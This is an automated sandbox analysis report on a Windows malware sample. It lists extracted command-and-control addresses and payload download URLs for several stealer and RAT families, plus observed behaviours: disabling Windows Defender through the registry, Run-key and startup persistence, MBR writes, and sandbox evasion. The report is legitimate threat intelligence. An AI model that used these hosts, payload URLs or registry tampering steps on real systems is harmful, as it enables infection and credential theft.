Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 02:41
Static task
static1
Behavioral task
behavioral1
Sample
5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe
Resource
win10v2004-20250217-en
General
-
Target
5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe
-
Size
2.1MB
-
MD5
8790df5ba7484035a89b0c8dfbfb4920
-
SHA1
bd9203c4b60a39e4fd95859fb2d7e3c586839ece
-
SHA256
5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7
-
SHA512
dc4f69714d6f3ffb26072511b54060715e12520f70e4fdd2143a1587fd0d0c1a9ebdb38a2194bd54b97fc5228e56f763bacbd2275844ff1364c10ca9e06aa634
-
SSDEEP
49152:Luhs9y+YruLgoFPcEwNuQoOrYYrwfnvBf6:aK9y+YruLZPQFU3Jf6
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023df5-890.dat family_xworm behavioral2/memory/2612-905-0x0000000000E30000-0x0000000000E40000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/840-1058-0x00000000004E0000-0x0000000000954000-memory.dmp healer behavioral2/memory/840-1059-0x00000000004E0000-0x0000000000954000-memory.dmp healer behavioral2/memory/840-1241-0x00000000004E0000-0x0000000000954000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/888-233-0x0000000000700000-0x0000000000B78000-memory.dmp family_sectoprat behavioral2/memory/888-234-0x0000000000700000-0x0000000000B78000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e0fbffd6a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ctlme.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 65 5820 powershell.exe 68 5820 powershell.exe 73 5820 powershell.exe 74 5820 powershell.exe 92 5820 powershell.exe 93 5820 powershell.exe 97 5820 powershell.exe 99 5820 powershell.exe 100 5820 powershell.exe 101 5820 powershell.exe 102 5820 powershell.exe 103 5820 powershell.exe 107 5820 powershell.exe 119 5820 powershell.exe 120 5820 powershell.exe 121 5820 powershell.exe 122 5820 powershell.exe 123 5820 powershell.exe 124 5820 powershell.exe 125 5820 powershell.exe 126 5820 powershell.exe 127 5820 powershell.exe 128 5820 powershell.exe 130 5820 powershell.exe 131 5820 powershell.exe 132 5820 powershell.exe 133 5820 powershell.exe 134 5820 powershell.exe 135 5820 powershell.exe 136 5820 powershell.exe 144 5820 powershell.exe 146 5820 powershell.exe 147 5820 powershell.exe 148 5820 powershell.exe 153 5820 powershell.exe 154 5820 powershell.exe 155 5820 powershell.exe 157 5820 powershell.exe 158 5820 powershell.exe 159 5820 powershell.exe 160 5820 powershell.exe 161 5820 powershell.exe 162 5820 powershell.exe 163 5820 powershell.exe 166 5820 powershell.exe 170 5820 powershell.exe 171 5820 powershell.exe 172 5820 powershell.exe 173 5820 powershell.exe 174 5820 powershell.exe 175 5820 powershell.exe 176 5820 powershell.exe 177 5820 powershell.exe 178 5820 powershell.exe 184 5820 powershell.exe 186 5820 powershell.exe 188 5820 powershell.exe 189 5820 powershell.exe 192 5820 powershell.exe 193 5820 powershell.exe 194 5820 powershell.exe 197 5820 powershell.exe 201 5820 powershell.exe 202 5820 powershell.exe -
pid Process 6024 powershell.exe 1432 powershell.exe 2456 powershell.exe 3808 powershell.exe 2804 powershell.exe 3928 powershell.exe 2880 powershell.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 14 1456 skotes.exe 295 1456 skotes.exe 301 2880 powershell.exe 337 2804 powershell.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6096 msedge.exe 5932 msedge.exe 4180 chrome.exe 2476 chrome.exe 4596 msedge.exe 376 msedge.exe 4960 chrome.exe 5960 chrome.exe 5792 msedge.exe -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e0fbffd6a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ctlme.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ctlme.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e0fbffd6a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 41 IoCs
pid Process 1456 skotes.exe 4060 a4ed447d2f.exe 1356 a4ed447d2f.exe 5540 skotes.exe 1088 13Z5sqy.exe 5400 jonbDes.exe 2552 Bjkm5hE.exe 4908 Bjkm5hE.exe 740 Fe36XBk.exe 888 ViGgA8C.exe 1880 DTQCxXZ.exe 1788 TaVOM7x.exe 1584 d2YQIJa.exe 4912 skotes.exe 1044 sHN20me.exe 832 spoDnGT.exe 1156 Ta3ZyUR.exe 636 Ta3ZyUR.exe 3732 Ta3ZyUR.exe 1916 qFqSpAp.exe 2984 m5UP2Yj.exe 5276 7aencsM.exe 2072 7aencsM.exe 1764 7aencsM.exe 2612 C3hYpvm.exe 1404 oVpNTUm.exe 3040 433349306e.exe 840 TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE 3556 e0fbffd6a6.exe 4672 ctlme.exe 3808 Ta3ZyUR.exe 224 Ta3ZyUR.exe 6016 Ta3ZyUR.exe 3580 483d2fa8a0d53818306efeb32d3.exe 640 d2YQIJa.exe 4076 C3hYpvm.exe 1468 Bjkm5hE.exe 408 Bjkm5hE.exe 4920 qFqSpAp.exe 5164 oVpNTUm.exe 2780 skotes.exe -
Identifies Wine through registry keys 2 TTPs 18 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine e0fbffd6a6.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine ctlme.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine ViGgA8C.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine spoDnGT.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine d2YQIJa.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\433349306e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086592101\\433349306e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086593021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000c000000023c4a-983.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 1456 skotes.exe 5540 skotes.exe 740 Fe36XBk.exe 888 ViGgA8C.exe 1584 d2YQIJa.exe 4912 skotes.exe 1044 sHN20me.exe 832 spoDnGT.exe 2984 m5UP2Yj.exe 1404 oVpNTUm.exe 840 TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE 3556 e0fbffd6a6.exe 4672 ctlme.exe 3580 483d2fa8a0d53818306efeb32d3.exe 640 d2YQIJa.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4060 set thread context of 1356 4060 a4ed447d2f.exe 92 PID 2552 set thread context of 4908 2552 Bjkm5hE.exe 103 PID 1088 set thread context of 4060 1088 13Z5sqy.exe 117 PID 1156 set thread context of 3732 1156 Ta3ZyUR.exe 125 PID 1788 set thread context of 4312 1788 TaVOM7x.exe 128 PID 5276 set thread context of 1764 5276 7aencsM.exe 133 PID 3808 set thread context of 6016 3808 Ta3ZyUR.exe 192 PID 1468 set thread context of 408 1468 Bjkm5hE.exe 199 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\ctlme.job oVpNTUm.exe File created C:\Windows\Tasks\skotes.job 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe File created C:\Windows\Tasks\ctlme.job oVpNTUm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 4732 4060 WerFault.exe 90 6016 2552 WerFault.exe 102 4416 1156 WerFault.exe 123 404 5276 WerFault.exe 131 5856 2984 WerFault.exe 130 5944 3808 WerFault.exe 190 2456 1468 WerFault.exe 198 -
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0fbffd6a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 433349306e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoDnGT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ctlme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a4ed447d2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a4ed447d2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4088 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
